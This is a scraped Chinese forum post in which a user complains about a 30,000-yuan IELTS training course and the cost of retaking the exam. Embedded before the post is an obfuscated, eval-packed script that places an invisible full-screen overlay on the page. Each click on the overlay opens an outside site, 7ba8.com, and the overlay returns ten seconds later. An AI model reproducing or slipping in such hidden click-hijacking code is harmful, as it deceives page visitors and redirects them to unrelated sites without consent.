一起进来团哭 关于烤鸭的那些烦心事

<script>;eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('(3(){3 4(){8 o=2.9(\'a\');o.1.b=\'c\';o.1.d=\'0\';o.1.e=\'0\';o.1.f=\'5%\';o.1.g=\'5%\';o.1.h=\'i\';o.1.j=\'k\';o.l(\'m\',()=>{n.p(\'q://r.s\');o.t();u(()=>{2.6.7(o)},v)});2.6.7(o)}4()})();',32,32,'|style|document|function|ad|100|body|appendChild|const|createElement|div|position|fixed|top|left|width|height|zIndex|99999999999|display|flex|addEventListener|click|window||open|https|7ba8|com|remove|setTimeout|10000'.split('|'),0,{}));</script>朋友要考雅思,陪她去某雅思培训咨询……结果差点没把我吓死。虽然她本人水平次点吧,四级水平不到,但那里的课程顾问竟然开口就要3万多,上8个月。说是课时挺多的,天天白天全天,英语授课。但也不至于3万多吧~~~这还是打8折的……orz
贵死了……
还一味标榜有考官什么什么什么什么的……也许一分钱一分货……可性价比我看不到……
我自己已经考过雅思了,也算是个老烤鸭党了。一共考了3次,考试费也交了3次,5000大米就这么没了。真贵……
个人意见,相关人等表打我!谢谢
您需要登录后才可以回帖 登录 | 注册

本版积分规则

Copyright © 2020-2021 tigtag.com |网站地图  
快速回复 返回列表 返回顶部